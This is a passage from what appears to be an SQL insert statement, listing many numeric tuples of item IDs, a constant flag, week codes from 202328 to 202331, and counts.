),(3038,1,'202328',3),(3041,1,'202328',3),(3063,1,'202328',3),(3096,1,'202328',3),(3257,1,'202328',3),(3259,1,'202328',3),(3263,1,'202328',3),(3271,1,'202328',3),(3278,1,'202328',3),(3285,1,'202328',3),(3290,1,'202328',3),(3307,1,'202328',3),(3313,1,'202328',3),(3316,1,'202328',3),(3438,1,'202328',3),(3724,1,'202328',3),(3731,1,'202328',3),(3749,1,'202328',3),(3774,1,'202328',3),(4329,1,'202328',3),(4332,1,'202328',3),(4387,1,'202328',3),(4391,1,'202328',3),(4428,1,'202328',3),(4691,1,'202328',3),(4753,1,'202328',3),(4762,1,'202328',3),(4768,1,'202328',3),(4771,1,'202328',3),(4874,1,'202328',3),(4893,1,'202328',3),(4983,1,'202328',3),(5024,1,'202328',3),(5050,1,'202328',3),(5054,1,'202328',3),(5101,1,'202328',3),(5268,1,'202328',3),(5292,1,'202328',3),(5295,1,'202328',3),(467,1,'202328',4),(483,1,'202328',4),(486,1,'202328',4),(570,1,'202328',4),(1709,1,'202328',4),(1718,1,'202328',4),(1726,1,'202328',4),(1770,1,'202328',4),(2813,1,'202328',4),(2964,1,'202328',4),(3092,1,'202328',4),(3229,1,'202328',4),(3245,1,'202328',4),(3479,1,'202328',4),(3534,1,'202328',4),(3721,1,'202328',4),(3752,1,'202328',4),(4301,1,'202328',4),(4326,1,'202328',4),(4416,1,'202328',4),(4444,1,'202328',4),(4524,1,'202328',4),(4546,1,'202328',4),(4556,1,'202328',4),(4654,1,'202328',4),(4703,1,'202328',4),(4776,1,'202328',4),(5042,1,'202328',4),(5046,1,'202328',4),(5067,1,'202328',4),(5071,1,'202328',4),(5134,1,'202328',4),(5253,1,'202328',4),(5280,1,'202328',4),(5289,1,'202328',4),(5307,1,'202328',4),(5320,1,'202328',4),(5326,1,'202328',4),(5330,1,'202328',4),(479,1,'202328',5),(482,1,'202328',5),(488,1,'202328',5),(1606,1,'202328',5),(1703,1,'202328',5),(1722,1,'202328',5),(1724,1,'202328',5),(2159,1,'202328',5),(2751,1,'202328',5),(2801,1,'202328',5),(3045,1,'202328',5),(3102,1,'202328',5),(3273,1,'202328',5),(3489,1,'202328',5),(4341,1,'202328',5),(4706,1,'202328',5),(4722,1,'202328',5),(5080,1,'202328',5),(5271,1,'202328',5),(5276,1,'202328',5),(5310,1,'202328',5),(102,1,'202328',6),(478,1,'202328',6),(1699,1,'202328',6),(2293,1,'202328',6),(2775,1,'202328',6),(2911,1,'202328',6),(3079,1,'202328',6),(3083,1,'202328',6),(3247,1,'202328',6),(3486,1,'202328',6),(3498,1,'202328',6),(4238,1,'202328',6),(4747,1,'202328',6),(4750,1,'202328',6),(4866,1,'202328',6),(4977,1,'202328',6),(5122,1,'202328',6),(477,1,'202328',7),(480,1,'202328',7),(1604,1,'202328',7),(2178,1,'202328',7),(2769,1,'202328',7),(2804,1,'202328',7),(3060,1,'202328',7),(4323,1,'202328',7),(4448,1,'202328',7),(4520,1,'202328',7),(4529,1,'202328',7),(4612,1,'202328',7),(4765,1,'202328',7),(5259,1,'202328',7),(5314,1,'202328',7),(472,1,'202328',8),(1584,1,'202328',8),(1614,1,'202328',8),(2609,1,'202328',8),(2617,1,'202328',8),(3004,1,'202328',8),(3107,1,'202328',8),(4420,1,'202328',8),(4663,1,'202328',8),(4980,1,'202328',8),(4988,1,'202328',8),(5033,1,'202328',8),(5076,1,'202328',8),(5140,1,'202328',8),(5264,1,'202328',8),(5353,1,'202328',8),(5359,1,'202328',8),(87,1,'202328',9),(1592,1,'202328',9),(1745,1,'202328',9),(1774,1,'202328',9),(4338,1,'202328',9),(4608,1,'202328',9),(5062,1,'202328',9),(3069,1,'202328',10),(4709,1,'202328',10),(4976,1,'202328',10),(74,1,'202328',11),(108,1,'202328',11),(469,1,'202328',11),(1728,1,'202328',11),(2296,1,'202328',11),(2309,1,'202328',11),(2457,1,'202328',11),(2503,1,'202328',11),(4700,1,'202328',11),(5163,1,'202328',11),(5334,1,'202328',11),(470,1,'202328',12),(1766,1,'202328',12),(3005,1,'202328',12),(4645,1,'202328',12),(5256,1,'202328',12),(84,1,'202328',13),(335,1,'202328',13),(1602,1,'202328',13),(2658,1,'202328',13),(4412,1,'202328',13),(4674,1,'202328',13),(474,1,'202328',14),(1608,1,'202328',14),(1610,1,'202328',14),(2809,1,'202328',14),(4677,1,'202328',14),(1544,1,'202328',15),(1588,1,'202328',15),(1598,1,'202328',15),(3066,1,'202328',15),(4930,1,'202328',15),(5356,1,'202328',15),(487,1,'202328',16),(1600,1,'202328',16),(1612,1,'202328',16),(76,1,'202328',17),(468,1,'202328',17),(1586,1,'202328',17),(4457,1,'202328',17),(1596,1,'202328',19),(3030,1,'202328',19),(3781,1,'202328',19),(4759,1,'202328',19),(5131,1,'202328',19),(89,1,'202328',20),(91,1,'202328',22),(3764,1,'202328',24),(1582,1,'202328',25),(1594,1,'202328',27),(68,1,'202328',28),(473,1,'202328',28),(3090,1,'202328',29),(72,1,'202328',39),(2904,1,'202328',43),(80,1,'202328',128),(9,1,'202328',789),(110,1,'202329',1),(483,1,'202329',1),(1707,1,'202329',1),(1713,1,'202329',1),(1739,1,'202329',1),(1741,1,'202329',1),(3247,1,'202329',1),(3307,1,'202329',1),(3534,1,'202329',1),(3727,1,'202329',1),(3735,1,'202329',1),(3742,1,'202329',1),(3774,1,'202329',1),(4428,1,'202329',1),(4517,1,'202329',1),(4657,1,'202329',1),(4681,1,'202329',1),(4688,1,'202329',1),(4797,1,'202329',1),(5101,1,'202329',1),(5301,1,'202329',1),(477,1,'202329',2),(488,1,'202329',2),(1590,1,'202329',2),(1709,1,'202329',2),(1726,1,'202329',2),(1743,1,'202329',2),(1747,1,'202329',2),(1770,1,'202329',2),(1776,1,'202329',2),(2156,1,'202329',2),(2161,1,'202329',2),(2165,1,'202329',2),(2801,1,'202329',2),(2991,1,'202329',2),(3006,1,'202329',2),(3027,1,'202329',2),(3045,1,'202329',2),(3063,1,'202329',2),(3079,1,'202329',2),(3097,1,'202329',2),(3127,1,'202329',2),(3265,1,'202329',2),(3271,1,'202329',2),(3479,1,'202329',2),(3482,1,'202329',2),(3486,1,'202329',2),(3498,1,'202329',2),(3531,1,'202329',2),(3541,1,'202329',2),(3721,1,'202329',2),(3738,1,'202329',2),(3746,1,'202329',2),(4275,1,'202329',2),(4382,1,'202329',2),(4400,1,'202329',2),(4408,1,'202329',2),(4424,1,'202329',2),(4444,1,'202329',2),(4691,1,'202329',2),(4712,1,'202329',2),(4722,1,'202329',2),(4747,1,'202329',2),(4750,1,'202329',2),(4792,1,'202329',2),(4802,1,'202329',2),(4862,1,'202329',2),(4883,1,'202329',2),(4893,1,'202329',2),(5042,1,'202329',2),(5289,1,'202329',2),(5295,1,'202329',2),(5323,1,'202329',2),(478,1,'202329',3),(479,1,'202329',3),(485,1,'202329',3),(1695,1,'202329',3),(1703,1,'202329',3),(1705,1,'202329',3),(1720,1,'202329',3),(1730,1,'202329',3),(1734,1,'202329',3),(1768,1,'202329',3),(2063,1,'202329',3),(2248,1,'202329',3),(2558,1,'202329',3),(2748,1,'202329',3),(2804,1,'202329',3),(2813,1,'202329',3),(2964,1,'202329',3),(2993,1,'202329',3),(3038,1,'202329',3),(3072,1,'202329',3),(3104,1,'202329',3),(3117,1,'202329',3),(3259,1,'202329',3),(3263,1,'202329',3),(3273,1,'202329',3),(3280,1,'202329',3),(3297,1,'202329',3),(3430,1,'202329',3),(3438,1,'202329',3),(3731,1,'202329',3),(3749,1,'202329',3),(3752,1,'202329',3),(3771,1,'202329',3),(3777,1,'202329',3),(4326,1,'202329',3),(4341,1,'202329',3),(4368,1,'202329',3),(4391,1,'202329',3),(4440,1,'202329',3),(4454,1,'202329',3),(4514,1,'202329',3),(4546,1,'202329',3),(4551,1,'202329',3),(4556,1,'202329',3),(4660,1,'202329',3),(4685,1,'202329',3),(4762,1,'202329',3),(4858,1,'202329',3),(4870,1,'202329',3),(4976,1,'202329',3),(4996,1,'202329',3),(5050,1,'202329',3),(5058,1,'202329',3),(5134,1,'202329',3),(5146,1,'202329',3),(5259,1,'202329',3),(5271,1,'202329',3),(5298,1,'202329',3),(102,1,'202329',4),(481,1,'202329',4),(482,1,'202329',4),(484,1,'202329',4),(1697,1,'202329',4),(1701,1,'202329',4),(1732,1,'202329',4),(1749,1,'202329',4),(2152,1,'202329',4),(2154,1,'202329',4),(2178,1,'202329',4),(2252,1,'202329',4),(2617,1,'202329',4),(2965,1,'202329',4),(2989,1,'202329',4),(3023,1,'202329',4),(3041,1,'202329',4),(3060,1,'202329',4),(3087,1,'202329',4),(3124,1,'202329',4),(3243,1,'202329',4),(3245,1,'202329',4),(3249,1,'202329',4),(3275,1,'202329',4),(3313,1,'202329',4),(3724,1,'202329',4),(4338,1,'202329',4),(4357,1,'202329',4),(4404,1,'202329',4),(4420,1,'202329',4),(4436,1,'202329',4),(4524,1,'202329',4),(4566,1,'202329',4),(4582,1,'202329',4),(4591,1,'202329',4),(4668,1,'202329',4),(4697,1,'202329',4),(4756,1,'202329',4),(4878,1,'202329',4),(4897,1,'202329',4),(5028,1,'202329',4),(5037,1,'202329',4),(5125,1,'202329',4),(5153,1,'202329',4),(5248,1,'202329',4),(5304,1,'202329',4),(5310,1,'202329',4),(5330,1,'202329',4),(480,1,'202329',5),(486,1,'202329',5),(1606,1,'202329',5),(1608,1,'202329',5),(1711,1,'202329',5),(1715,1,'202329',5),(1737,1,'202329',5),(1751,1,'202329',5),(1772,1,'202329',5),(1778,1,'202329',5),(1782,1,'202329',5),(2150,1,'202329',5),(2704,1,'202329',5),(2956,1,'202329',5),(3034,1,'202329',5),(3090,1,'202329',5),(3109,1,'202329',5),(3226,1,'202329',5),(3257,1,'202329',5),(3269,1,'202329',5),(3278,1,'202329',5),(3710,1,'202329',5),(3714,1,'202329',5),(4329,1,'202329',5),(4363,1,'202329',5),(4373,1,'202329',5),(4377,1,'202329',5),(4396,1,'202329',5),(4416,1,'202329',5),(4432,1,'202329',5),(4448,1,'202329',5),(4529,1,'202329',5),(4542,1,'202329',5),(4651,1,'202329',5),(4694,1,'202329',5),(4706,1,'202329',5),(4709,1,'202329',5),(4744,1,'202329',5),(4753,1,'202329',5),(4765,1,'202329',5),(4888,1,'202329',5),(4930,1,'202329',5),(4983,1,'202329',5),(5024,1,'202329',5),(5128,1,'202329',5),(5140,1,'202329',5),(5268,1,'202329',5),(5326,1,'202329',5),(471,1,'202329',6),(476,1,'202329',6),(1699,1,'202329',6),(1722,1,'202329',6),(1780,1,'202329',6),(2148,1,'202329',6),(2159,1,'202329',6),(2297,1,'202329',6),(2751,1,'202329',6),(3005,1,'202329',6),(3096,1,'202329',6),(3267,1,'202329',6),(4301,1,'202329',6),(4323,1,'202329',6),(4332,1,'202329',6),(4335,1,'202329',6),(4387,1,'202329',6),(4654,1,'202329',6),(4677,1,'202329',6),(4703,1,'202329',6),(4768,1,'202329',6),(4776,1,'202329',6),(4980,1,'202329',6),(5046,1,'202329',6),(5067,1,'202329',6),(5071,1,'202329',6),(5080,1,'202329',6),(5137,1,'202329',6),(5157,1,'202329',6),(5253,1,'202329',6),(5264,1,'202329',6),(5292,1,'202329',6),(5320,1,'202329',6),(5353,1,'202329',6),(5363,1,'202329',6),(87,1,'202329',7),(467,1,'202329',7),(1584,1,'202329',7),(1604,1,'202329',7),(2296,1,'202329',7),(3092,1,'202329',7),(3107,1,'202329',7),(3229,1,'202329',7),(3261,1,'202329',7),(3282,1,'202329',7),(3285,1,'202329',7),(3287,1,'202329',7),(4587,1,'202329',7),(4741,1,'202329',7),(4977,1,'202329',7),(4988,1,'202329',7),(5054,1,'202329',7),(5280,1,'202329',7),(5317,1,'202329',7),(74,1,'202329',8),(474,1,'202329',8),(1718,1,'202329',8),(2293,1,'202329',8),(2775,1,'202329',8),(3083,1,'202329',8),(3253,1,'202329',8),(3290,1,'202329',8),(3489,1,'202329',8),(4520,1,'202329',8),(4771,1,'202329',8),(4874,1,'202329',8),(5314,1,'202329',8),(5356,1,'202329',8),(1745,1,'202329',9),(1774,1,'202329',9),(2503,1,'202329',9),(2609,1,'202329',9),(2769,1,'202329',9),(3069,1,'202329',9),(4663,1,'202329',9),(5062,1,'202329',9),(5307,1,'202329',9),(5359,1,'202329',9),(469,1,'202329',10),(570,1,'202329',10),(1728,1,'202329',10),(2309,1,'202329',10),(2911,1,'202329',10),(3004,1,'202329',10),(3240,1,'202329',10),(4608,1,'202329',10),(4674,1,'202329',10),(4700,1,'202329',10),(5033,1,'202329',10),(5076,1,'202329',10),(5276,1,'202329',10),(108,1,'202329',11),(487,1,'202329',11),(1766,1,'202329',11),(2457,1,'202329',11),(4866,1,'202329',11),(5122,1,'202329',11),(5334,1,'202329',11),(84,1,'202329',12),(473,1,'202329',12),(1724,1,'202329',12),(5256,1,'202329',12),(335,1,'202329',13),(472,1,'202329',13),(1544,1,'202329',13),(1610,1,'202329',13),(3102,1,'202329',13),(91,1,'202329',14),(1614,1,'202329',14),(2658,1,'202329',14),(3251,1,'202329',14),(4238,1,'202329',14),(89,1,'202329',15),(3066,1,'202329',15),(4412,1,'202329',15),(4612,1,'202329',15),(1600,1,'202329',16),(4759,1,'202329',16),(72,1,'202329',17),(1592,1,'202329',17),(4457,1,'202329',17),(4645,1,'202329',17),(76,1,'202329',18),(1602,1,'202329',18),(5131,1,'202329',18),(470,1,'202329',19),(3030,1,'202329',19),(3781,1,'202329',19),(468,1,'202329',20),(3764,1,'202329',20),(1598,1,'202329',21),(2809,1,'202329',21),(5163,1,'202329',21),(1588,1,'202329',23),(1596,1,'202329',23),(1594,1,'202329',28),(68,1,'202329',30),(1612,1,'202329',30),(1582,1,'202329',37),(1586,1,'202329',38),(2904,1,'202329',39),(80,1,'202329',120),(9,1,'202329',668),(106,1,'202330',1),(476,1,'202330',1),(1730,1,'202330',1),(2293,1,'202330',1),(3041,1,'202330',1),(3072,1,'202330',1),(3127,1,'202330',1),(3249,1,'202330',1),(3479,1,'202330',1),(3738,1,'202330',1),(4275,1,'202330',1),(4323,1,'202330',1),(4428,1,'202330',1),(4566,1,'202330',1),(4668,1,'202330',1),(4685,1,'202330',1),(4688,1,'202330',1),(4792,1,'202330',1),(5140,1,'202330',1),(5146,1,'202330',1),(5157,1,'202330',1),(5248,1,'202330',1),(5298,1,'202330',1),(5301,1,'202330',1),(5320,1,'202330',1),(5326,1,'202330',1),(5363,1,'202330',1),(102,1,'202330',2),(110,1,'202330',2),(471,1,'202330',2),(472,1,'202330',2),(484,1,'202330',2),(1697,1,'202330',2),(1701,1,'202330',2),(1705,1,'202330',2),(1707,1,'202330',2),(1713,1,'202330',2),(1715,1,'202330',2),(1720,1,'202330',2),(1726,1,'202330',2),(1741,1,'202330',2),(1780,1,'202330',2),(1782,1,'202330',2),(2965,1,'202330',2),(3027,1,'202330',2),(3229,1,'202330',2),(3240,1,'202330',2),(3257,1,'202330',2),(3269,1,'202330',2),(3271,1,'202330',2),(3285,1,'202330',2),(3714,1,'202330',2),(3727,1,'202330',2),(3731,1,'202330',2),(3742,1,'202330',2),(3771,1,'202330',2),(4326,1,'202330',2),(4329,1,'202330',2),(4368,1,'202330',2),(4377,1,'202330',2),(4408,1,'202330',2),(4424,1,'202330',2),(4440,1,'202330',2),(4517,1,'202330',2),(4582,1,'202330',2),(4681,1,'202330',2),(4802,1,'202330',2),(5037,1,'202330',2),(5050,1,'202330',2),(5125,1,'202330',2),(5137,1,'202330',2),(5268,1,'202330',2),(5271,1,'202330',2),(478,1,'202330',3),(479,1,'202330',3),(480,1,'202330',3),(481,1,'202330',3),(483,1,'202330',3),(1590,1,'202330',3),(1695,1,'202330',3),(1699,1,'202330',3),(1703,1,'202330',3),(1711,1,'202330',3),(1737,1,'202330',3),(1739,1,'202330',3),(1743,1,'202330',3),(1751,1,'202330',3),(2063,1,'202330',3),(2156,1,'202330',3),(2748,1,'202330',3),(2911,1,'202330',3),(2956,1,'202330',3),(2991,1,'202330',3),(2993,1,'202330',3),(3023,1,'202330',3),(3038,1,'202330',3),(3087,1,'202330',3),(3096,1,'202330',3),(3117,1,'202330',3),(3261,1,'202330',3),(3263,1,'202330',3),(3265,1,'202330',3),(3273,1,'202330',3),(3297,1,'202330',3),(3307,1,'202330',3),(3486,1,'202330',3),(3710,1,'202330',3),(3721,1,'202330',3),(3749,1,'202330',3),(3752,1,'202330',3),(3774,1,'202330',3),(3777,1,'202330',3),(4357,1,'202330',3),(4363,1,'202330',3),(4373,1,'202330',3),(4387,1,'202330',3),(4396,1,'202330',3),(4400,1,'202330',3),(4404,1,'202330',3),(4432,1,'202330',3),(4514,1,'202330',3),(4651,1,'202330',3),(4654,1,'202330',3),(4660,1,'202330',3),(4663,1,'202330',3),(4694,1,'202330',3),(4697,1,'202330',3),(4712,1,'202330',3),(4756,1,'202330',3),(4797,1,'202330',3),(5028,1,'202330',3),(5042,1,'202330',3),(5046,1,'202330',3),(5153,1,'202330',3),(5253,1,'202330',3),(5256,1,'202330',3),(5289,1,'202330',3),(5292,1,'202330',3),(5295,1,'202330',3),(485,1,'202330',4),(486,1,'202330',4),(1709,1,'202330',4),(1732,1,'202330',4),(1734,1,'202330',4),(1747,1,'202330',4),(1768,1,'202330',4),(1770,1,'202330',4),(1772,1,'202330',4),(1776,1,'202330',4),(2161,1,'202330',4),(2248,1,'202330',4),(2252,1,'202330',4),(2296,1,'202330',4),(2801,1,'202330',4),(3063,1,'202330',4),(3097,1,'202330',4),(3104,1,'202330',4),(3109,1,'202330',4),(3243,1,'202330',4),(3253,1,'202330',4),(3275,1,'202330',4),(3278,1,'202330',4),(3280,1,'202330',4),(3282,1,'202330',4),(3430,1,'202330',4),(3498,1,'202330',4),(3531,1,'202330',4),(3541,1,'202330',4),(4341,1,'202330',4),(4382,1,'202330',4),(4416,1,'202330',4),(4454,1,'202330',4),(4542,1,'202330',4),(4546,1,'202330',4),(4657,1,'202330',4),(4691,1,'202330',4),(4722,1,'202330',4),(4741,1,'202330',4),(4744,1,'202330',4),(4747,1,'202330',4),(4750,1,'202330',4),(4765,1,'202330',4),(4768,1,'202330',4),(4874,1,'202330',4),(4883,1,'202330',4),(4893,1,'202330',4),(4897,1,'202330',4),(4977,1,'202330',4),(5020,1,'202330',4),(5024,1,'202330',4),(5054,1,'202330',4),(5058,1,'202330',4),(5080,1,'202330',4),(5101,1,'202330',4),(5128,1,'202330',4),(5134,1,'202330',4),(5330,1,'202330',4),(477,1,'202330',5),(488,1,'202330',5),(1584,1,'202330',5),(1606,1,'202330',5),(1614,1,'202330',5),(1722,1,'202330',5),(1745,1,'202330',5),(1778,1,'202330',5),(2148,1,'202330',5),(2150,1,'202330',5),(2159,1,'202330',5),(2617,1,'202330',5),(2804,1,'202330',5),(2964,1,'202330',5),(2989,1,'202330',5),(3006,1,'202330',5),(3034,1,'202330',5),(3079,1,'202330',5),(3102,1,'202330',5),(3124,1,'202330',5),(3287,1,'202330',5),(3290,1,'202330',5),(3313,1,'202330',5),(3316,1,'202330',5),(3438,1,'202330',5),(3482,1,'202330',5),(3534,1,'202330',5),(3735,1,'202330',5),(3746,1,'202330',5),(4238,1,'202330',5),(4301,1,'202330',5),(4332,1,'202330',5),(4338,1,'202330',5),(4420,1,'202330',5),(4436,1,'202330',5),(4524,1,'202330',5),(4551,1,'202330',5),(4556,1,'202330',5),(4587,1,'202330',5),(4591,1,'202330',5),(4677,1,'202330',5),(4753,1,'202330',5),(4759,1,'202330',5),(4776,1,'202330',5),(4858,1,'202330',5),(4862,1,'202330',5),(4866,1,'202330',5),(4878,1,'202330',5),(4888,1,'202330',5),(4980,1,'202330',5),(5067,1,'202330',5),(5071,1,'202330',5),(5259,1,'202330',5),(5304,1,'202330',5),(482,1,'202330',6),(2152,1,'202330',6),(2297,1,'202330',6),(2457,1,'202330',6),(2558,1,'202330',6),(2609,1,'202330',6),(2751,1,'202330',6),(2813,1,'202330',6),(3107,1,'202330',6),(3247,1,'202330',6),(3259,1,'202330',6),(3267,1,'202330',6),(3489,1,'202330',6),(4391,1,'202330',6),(4612,1,'202330',6),(4703,1,'202330',6),(4709,1,'202330',6),(4976,1,'202330',6),(4983,1,'202330',6),(5076,1,'202330',6),(5307,1,'202330',6),(5310,1,'202330',6),(74,1,'202330',7),(487,1,'202330',7),(1718,1,'202330',7),(1749,1,'202330',7),(2154,1,'202330',7),(3005,1,'202330',7),(3245,1,'202330',7),(3724,1,'202330',7),(4444,1,'202330',7),(4448,1,'202330',7),(4529,1,'202330',7),(4648,1,'202330',7),(4700,1,'202330',7),(4762,1,'202330',7),(4988,1,'202330',7),(4996,1,'202330',7),(5264,1,'202330',7),(5334,1,'202330',7),(5359,1,'202330',7),(87,1,'202330',8),(474,1,'202330',8),(570,1,'202330',8),(2704,1,'202330',8),(2775,1,'202330',8),(3045,1,'202330',8),(3090,1,'202330',8),(3226,1,'202330',8),(4674,1,'202330',8),(4706,1,'202330',8),(4771,1,'202330',8),(4870,1,'202330',8),(5033,1,'202330',8),(5276,1,'202330',8),(5317,1,'202330',8),(5353,1,'202330',8),(5356,1,'202330',8),(84,1,'202330',9),(335,1,'202330',9),(473,1,'202330',9),(1724,1,'202330',9),(2165,1,'202330',9),(2178,1,'202330',9),(3060,1,'202330',9),(3069,1,'202330',9),(3092,1,'202330',9),(4335,1,'202330',9),(4645,1,'202330',9),(5122,1,'202330',9),(5314,1,'202330',9),(91,1,'202330',10),(469,1,'202330',10),(1598,1,'202330',10),(1766,1,'202330',10),(2503,1,'202330',10),(4412,1,'202330',10),(5062,1,'202330',10),(5280,1,'202330',10),(108,1,'202330',11),(1608,1,'202330',11),(1774,1,'202330',11),(2769,1,'202330',11),(4608,1,'202330',11),(4930,1,'202330',11),(5131,1,'202330',11),(467,1,'202330',12),(470,1,'202330',12),(1592,1,'202330',12),(1604,1,'202330',12),(2309,1,'202330',12),(3083,1,'202330',12),(4520,1,'202330',12),(468,1,'202330',13),(1588,1,'202330',13),(1596,1,'202330',13),(3004,1,'202330',13),(1728,1,'202330',14),(2658,1,'202330',14),(3030,1,'202330',14),(3066,1,'202330',14),(3764,1,'202330',14),(2809,1,'202330',15),(3251,1,'202330',15),(76,1,'202330',16),(1600,1,'202330',16),(1602,1,'202330',16),(1610,1,'202330',16),(1544,1,'202330',17),(4457,1,'202330',17),(3781,1,'202330',18),(1594,1,'202330',19),(72,1,'202330',20),(5163,1,'202330',20),(68,1,'202330',23),(89,1,'202330',23),(1582,1,'202330',25),(2904,1,'202330',26),(1586,1,'202330',28),(1612,1,'202330',29),(80,1,'202330',120),(9,1,'202330',636),(106,1,'202331',1),(1732,1,'202331',1),(1743,1,'202331',1),(1751,1,'202331',1),(2150,1,'202331',1),(2252,1,'202331',1),(2297,1,'202331',1),(3063,1,'202331',1),(3072,1,'202331',1),(3243,1,'202331',1),(3249,1,'202331',1),(3253,1,'202331',1),(3278,1,'202331',1),(3280,1,'202331',1),(3724,1,'202331',1),(3727,1,'202331',1),(3749,1,'202331',1),(4275,1,'202331',1),(4332,1,'202331',1),(4357,1,'202331',1),(4424,1,'202331',1),(4440,1,'202331',1),(4444,1,'202331',1),(4556,1,'202331',1),(4591,1,'202331',1),(4762,1,'202331',1),(4797,1,'202331',1),(4866,1,'202331',1),(4888,1,'202331',1),(4983,1,'202331',1),(4996,1,'202331',1),(5020,1,'202331',1),(110,1,'202331',2),(1695,1,'202331',2),(1699,1,'202331',2),(1768,1,'202331',2),(1770,1,'202331',2),(1772,1,'202331',2),(2148,1,'202331',2),(2152,1,'202331',2),(2156,1,'202331',2),(2178,1,'202331',2),(2293,1,'202331',2),(2296,1,'202331',2),(3034,1,'202331',2),(3038,1,'202331',2),(3041,1,'202331',2),(3066,1,'202331',2),(3079,1,'202331',2),(3097,1,'202331',2),(3109,1,'202331',2),(3240,1,'202331',2),(3257,1,'202331',2),(3263,1,'202331',2),(3265,1,'202331',2),(3267,1,'202331',2),(3269,1,'202331',2),(3430,1,'202331',2),(3438,1,'202331',2),(3482,1,'202331',2),(3531,1,'202331',2),(3721,1,'202331',2),(3738,1,'202331',2),(3771,1,'202331',2),(3774,1,'202331',2),(3777,1,'202331',2),(4329,1,'202331',2),(4373,1,'202331',2),(4377,1,'202331',2),(4387,1,'202331',2),(4404,1,'202331',2),(4428,1,'202331',2),(4432,1,'202331',2),(4668,1,'202331',2),(4722,1,'202331',2),(4741,1,'202331',2),(4744,1,'202331',2),(4750,1,'202331',2),(4802,1,'202331',2),(4858,1,'202331',2),(4862,1,'202331',2),(4883,1,'202331',2),(4897,1,'202331',2),(4976,1,'202331',2),(5134,1,'202331',2),(1697,1,'202331',3),(1701,1,'202331',3),(1707,1,'202331',3),(1709,1,'202331',3),(1711,1,'202331',3),(1715,1,'202331',3),(1718,1,'202331',3),(1730,1,'202331',3),(1737,1,'202331',3),(1747,1,'202331',3),(1780,1,'202331',3),(2063,1,'202331',3),(2161,1,'202331',3),(2558,1,'202331',3),(2617,1,'202331',3),(2991,1,'202331',3),(2993,1,'202331',3),(3069,1,'202331',3),(3087,1,'202331',3),(3092,1,'202331',3),(3104,1,'202331',3),(3226,1,'202331',3),(3229,1,'202331',3),(3245,1,'202331',3),(3259,1,'202331',3),(3273,1,'202331',3),(3275,1,'202331',3),(3282,1,'202331',3),(3285,1,'202331',3),(3307,1,'202331',3),(3479,1,'202331',3),(3486,1,'202331',3),(3541,1,'202331',3),(3714,1,'202331',3),(3731,1,'202331',3),(3735,1,'202331',3),(3742,1,'202331',3),(3746,1,'202331',3),(3752,1,'202331',3),(4338,1,'202331',3),(4368,1,'202331',3),(4382,1,'202331',3),(4396,1,'202331',3),(4454,1,'202331',3),(4517,1,'202331',3),(4524,1,'202331',3),(4542,1,'202331',3),(4546,1,'202331',3),(4551,1,'202331',3),(4566,1,'202331',3),(4582,1,'202331',3),(4651,1,'202331',3),(4657,1,'202331',3),(4660,1,'202331',3),(4681,1,'202331',3),(4691,1,'202331',3),(4747,1,'202331',3),(4768,1,'202331',3),(4771,1,'202331',3),(4792,1,'202331',3),(4870,1,'202331',3),(4893,1,'202331',3),(5024,1,'202331',3),(5028,1,'202331',3),(5101,1,'202331',3),(5268,1,'202331',3),(102,1,'202331',4),(1705,1,'202331',4),(1739,1,'202331',4),(1745,1,'202331',4),(1749,1,'202331',4),(1774,1,'202331',4),(1776,1,'202331',4),(1782,1,'202331',4),(2154,1,'202331',4),(2165,1,'202331',4),(2748,1,'202331',4),(2751,1,'202331',4),(2775,1,'202331',4),(2801,1,'202331',4),(2911,1,'202331',4),(2989,1,'202331',4),(3004,1,'202331',4),(3006,1,'202331',4),(3023,1,'202331',4),(3090,1,'202331',4),(3107,1,'202331',4),(3124,1,'202331',4),(3127,1,'202331',4),(3261,1,'202331',4),(3271,1,'202331',4),(3287,1,'202331',4),(3297,1,'202331',4),(3313,1,'202331',4),(3316,1,'202331',4),(3710,1,'202331',4),(4323,1,'202331',4),(4326,1,'202331',4),(4416,1,'202331',4),(4587,1,'202331',4),(4612,1,'202331',4),(4700,1,'202331',4),(4703,1,'202331',4),(4756,1,'202331',4),(4765,1,'202331',4),(4776,1,'202331',4),(4874,1,'202331',4),(4878,1,'202331',4),(5033,1,'202331',4),(5046,1,'202331',4),(5054,1,'202331',4),(5125,1,'202331',4),(5153,1,'202331',4),(5271,1,'202331',4),(5276,1,'202331',4),(5289,1,'202331',4),(1606,1,'202331',5),(1703,1,'202331',5),(1713,1,'202331',5),(1720,1,'202331',5),(1722,1,'202331',5),(1724,1,'202331',5),(1726,1,'202331',5),(1741,1,'202331',5),(1778,1,'202331',5),(2159,1,'202331',5),(2658,1,'202331',5),(2964,1,'202331',5),(2965,1,'202331',5),(3005,1,'202331',5),(3045,1,'202331',5),(3117,1,'202331',5),(3498,1,'202331',5),(4301,1,'202331',5),(4335,1,'202331',5),(4436,1,'202331',5),(4514,1,'202331',5),(4608,1,'202331',5),(4654,1,'202331',5),(4685,1,'202331',5),(4697,1,'202331',5),(4706,1,'202331',5),(4709,1,'202331',5),(4753,1,'202331',5),(4759,1,'202331',5),(4980,1,'202331',5),(5037,1,'202331',5),(5042,1,'202331',5),(5067,1,'202331',5),(5128,1,'202331',5),(5157,1,'202331',5),(5259,1,'202331',5),(5298,1,'202331',5),(5301,1,'202331',5),(5326,1,'202331',5),(5330,1,'202331',5),(478,1,'202331',6),(479,1,'202331',6),(483,1,'202331',6),(1610,1,'202331',6),(1614,1,'202331',6),(2813,1,'202331',6),(3083,1,'202331',6),(3102,1,'202331',6),(3247,1,'202331',6),(3290,1,'202331',6),(4341,1,'202331',6),(4391,1,'202331',6),(4400,1,'202331',6),(4448,1,'202331',6),(4529,1,'202331',6),(4645,1,'202331',6),(4663,1,'202331',6),(4674,1,'202331',6),(4677,1,'202331',6),(4694,1,'202331',6),(4712,1,'202331',6),(4977,1,'202331',6),(5253,1,'202331',6),(477,1,'202331',7),(480,1,'202331',7),(481,1,'202331',7),(482,1,'202331',7),(488,1,'202331',7),(570,1,'202331',7),(1590,1,'202331',7),(2769,1,'202331',7),(3027,1,'202331',7),(3251,1,'202331',7),(4363,1,'202331',7),(4420,1,'202331',7),(4688,1,'202331',7),(5058,1,'202331',7),(5071,1,'202331',7),(5122,1,'202331',7),(5140,1,'202331',7),(5146,1,'202331',7),(5295,1,'202331',7),(5310,1,'202331',7),(5317,1,'202331',7),(5363,1,'202331',7),(467,1,'202331',8),(471,1,'202331',8),(476,1,'202331',8),(485,1,'202331',8),(2309,1,'202331',8),(2804,1,'202331',8),(2809,1,'202331',8),(2956,1,'202331',8),(3030,1,'202331',8),(3534,1,'202331',8),(4238,1,'202331',8),(4988,1,'202331',8),(5080,1,'202331',8),(5256,1,'202331',8),(5264,1,'202331',8),(5280,1,'202331',